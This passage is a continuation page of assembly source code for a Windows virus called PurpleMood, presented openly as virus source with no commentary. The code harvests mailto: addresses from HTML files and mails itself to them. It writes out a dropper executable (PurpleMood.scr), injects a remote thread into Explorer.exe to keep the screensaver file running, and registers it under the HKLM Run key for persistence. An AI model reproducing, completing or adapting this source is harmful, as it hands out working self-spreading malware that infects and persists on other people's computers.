PurpleMood 紫色心情病毒源代码(续)
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push FileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
mov eax , 12345678h
_GetFileSize = dword ptr $-4
call eax
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi must be below SafeFSize
.while esi < SafeFSize
xor edx,edx ;Valid = FALSE
@pushsz 'mailto:
pop edi
push 7 ;strlen of 'mailto:
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi<SafeFSize
lodsb
.if al==' '
.continue
.elseif al=='>' || al=='"' ||al==''''||al=='<'
xor al,al
stosb
.break
.elseif al=='@'
stosb
inc edx
.else
stosb
.endif
.endw
pop edi
.if edx==1
call SendMail
.endif
.endif
inc esi
.endw
PH_Close3:
push esi
call _UnmapViewOfFile[ebx]
PH_Close2:
push hMapping
call _CloseHandle[ebx]
PH_Close:
push hFile
call _CloseHandle[ebx]
PH_Exit:
popad
ret 4
Parse_HTM ENDP
;****************************
;data used by SendMail
;****************************
WSA_Data WSADATA <>
VSocket dd 0
_send dd 0
Base64_Encoded_Data dd 0
Base64DecodeTable equ $
db 'A','B','C','D','E','F','G','H','I','J'
db 'K','L','M','N','O','P','Q','R','S','T'
db 'U','V','W','X','Y','Z','a','b','c','d'
db 'e','f','g','h','i','j','k','l','m','n'
db 'o','p','q','r','s','t','u','v','w','x'
db 'y','z','0','1','2','3','4','5','6','7'
db '8','9','+','/'
SizeOfBase64DecodeTable equ $-Base64DecodeTable
;********CreatePE**********************
CreatePE PROC
LOCAL ByteWrite:DWORD
pushad
lea eax , [offset szFilePath+ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[ebx]
or eax,eax
jz CT_Exit
xchg eax,esi
lea edi,ByteWrite
push 0
push edi
push 200h ; 文件头<200h & FileAliagment=200h
lea eax,[offset MDosStub+ebx]
push eax
push esi ;esi=hFile
call _WriteFile[ebx] ;Write DosStub,NTHeader,SectionHeader
push 0
push edi
push VRAW_SIZE
lea eax,[offset VStart+ebx]
push eax
push esi
call _WriteFile[ebx] ;Write code and import tatle
push esi
call _CloseHandle[ebx]
CT_Exit:
popad
ret
CreatePE ENDP
;*************MonitorThread********************************
;Enum所有活动进程,插入rtThreadStart->rtThreadEnd的代码,监视PurpleMood.scr
;的运行和注册表的Run项.
;**********************************************************
MonitorThread PROC MReloc : DWORD
mov ebx , MReloc
@pushsz 'PSAPI'
call _LoadLibraryA[ebx]
xchg eax,esi
@pushsz 'EnumProcesses'
push esi
call _GetProcAddress[ebx]
mov _EnumProcesses[ebx],eax
@pushsz 'EnumProcessModules'
push esi
call _GetProcAddress[ebx]
mov _EnumProcessModules[ebx],eax
@pushsz 'GetModuleBaseNameA'
push esi
call _GetProcAddress[ebx]
mov _GetModuleBaseNameA[ebx],eax
lea esi,[offset procz + ebx]
lea edi,[offset tmp + ebx]
push edi
push 128
push esi
mov eax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne MT_Exit
add esi,4 ;esi->ProcessIDs[128]
p_search:
lodsd ;get PID
test eax,eax
je MT_Exit
call AnalyseProcess ;and try to infect it
jmp p_search
MT_Exit:
ret 4
MonitorThread ENDP
AnalyseProcess Proc
pushad
push eax ;process id
push 0
push PROCESS_VM_OPERATION or PROCESS_CREATE_THREAD or PROCESS_VM_WRITE or P
ROCESS_VM_READ or PROCESS_QUERY_INFORMATION
mov eax,12345678h
_OpenProcess = dword ptr $-4
call eax ;PID -> handle
or eax,eax
jz AP_Exit
mov hProcess[ebx],eax
lea esi,[offset modz + ebx]
lea ecx,[offset tmp + ebx]
push ecx
push 4
push esi
push hProcess[ebx]
mov eax,12345678h
_EnumProcessModules = dword ptr $-4
call eax ;get first (main) module
dec eax
jne AP_Exit
lodsd
lea edi,[offset mod_name + ebx]
push MAX_PATH
push edi
push eax
push hProcess[ebx]
mov eax,12345678h
_GetModuleBaseNameA = dword ptr $-4
call eax ;get its name
test eax,eax
je AP_Exit
@pushsz 'Explorer.exe'
push edi
call _lstrcmpi[ebx]
jnz AP_Exit
lea esi,[offset rtThreadStart + ebx]
mov edi,rtThreadEnd - rtThreadStart
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push edi
push 0
push 12345678h
hProcess = dword ptr $-4
mov eax,12345678h
_VirtualAllocEx = dword ptr $-4
call eax ;aloc there a memory
test eax,eax
je AP_Exit
xchg eax,ebp
push 0
push edi
push esi
push ebp
push dword ptr [ebx + offset hProcess]
mov eax,12345678h
_WriteProcessMemory = dword ptr $-4
call eax ;write there our code
dec eax
jne AP_FreeMem
xor edx,edx
push edx
push edx
push edx
push ebp
push edx
push edx
push dword ptr hProcess[ebx]
mov eax,12345678h
_CreateRemoteThread = dword ptr $-4
call eax ;run remote thread!
jmp AP_Exit ;important,i forgot first
AP_FreeMem:
push MEM_RELEASE
push 0
push ebp
push dword ptr hProcess[ebx]
mov eax,12345678h
_VirtualFreeEx = dword ptr $-4
call eax ;free memory
AP_Exit :
popad
ret
AnalyseProcess EndP
procz dd 128 dup (?)
dd ?
modz dd ?
mod_name db MAX_PATH dup (?)
tmp dd ?
rtThreadStart:
call rtStart
rtStart:
pop ebx
sub ebx , offset rtStart
call rtInit
rtWork:
call MakeSCRAlive
push 1000*60
mov eax , 12345678h
_Sleep = dword ptr $ - 4
call eax
jmp short rtWork
rtInit:
@pushsz 'shlwapi.dll'
mov eax , 12345678h
_LoadLibraryA = dword ptr $ - 4
call eax
@pushsz 'SHSetValueA'
push eax
mov eax , 12345678h
_GetProcAddress = dword ptr $ - 4
call eax
mov _SHSetValueA[ebx],eax
ret
MakeSCRAlive:
call @RT1
nGetProcAddress db 'GetProcAddress',0
@RT1: push FALSE
push 1
mov eax , 12345678h
_OpenMutex = dword ptr $ - 4
call eax
xchg esi,eax
.if esi == NULL
jmp RunSCR
.else
push esi
mov eax , 12345678h
_ReleaseMutex = dword ptr $ - 4
call eax
push esi
mov eax , 12345678h
_CloseHandle = dword ptr $ - 4
call eax
jmp RegistSCR
.endif
RunSCR:
push SW_HIDE
call @RT2
szFilePath db 50 dup (0)
@RT2: mov eax , 12345678h
_WinExec = dword ptr $ - 4
call eax
RegistSCR:
lea eax,[offset szFilePath+ebx]
push 12345678h
SCRPathSize = dword ptr $-4
push eax
push REG_SZ
@pushsz 'PurpleMood'
@pushsz 'Software\Microsoft\Windows\CurrentVersion\Run'
push HKEY_LOCAL_MACHINE
mov eax,12345679h
_SHSetValueA = dword ptr $-4
call eax ;eax = SHSetValueA addr
ret
rtThreadEnd:
;*************Virus Data******************************
Signature db '紫色心情,你永远的期待',0
HostEntry dd 0
hKernel32 dd 0
szEXEPath db MAX_PATH dup (0)
szFileName db '\PurpleMood.scr',0
FNameSize = $ - szFileName
wfd WIN32_FIND_DATA <>
;*****************PE Data*****************************
VImports:
dd offset Kernel32_Pointers + @
dd -1,-1
dd offset Kernel32_Name + @
VIAT:
dd offset Kernel32_Relocated + @
db 14 dup (0)
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0
Kernel32_Beep db ?,?,'MessageBoxA',0
Kernel32_Name db 'User32.dll',0
MDosStub:
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00
db 50h,45h,00,00
MFileHeader:
Machine dw 14Ch
NumberOfSections dw 1
TimeDateStamp dd 3cbe5cc2h
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h
Characteristics dw 10fh
MIMAGE_OPTIONAL_HEADER32:
Magic dw 10bh
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd VRAW_SIZE
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32VersionValue dd 0
SizeOfImage dd 3000h;need to change st
SizeOfHeaders dd 200h
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h
DataDirectory dd 0,0
dd offset VImports+@,VIMPORT_SIZE
dd 14h dup(0)
dd offset VIAT + @,8
dd 0,0,0,0,0,0
MIMAGE_SECTION_HEADER:
Name1 db '.xjs',0,0,0,0
VirtualSize dd offset VEnd - offset VStart
VirtualAddress dd 1000h
SizeOfRawData dd VRAW_SIZE
PointerToRawData dd 200h
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h
VEnd:
CODE ends
end main
评论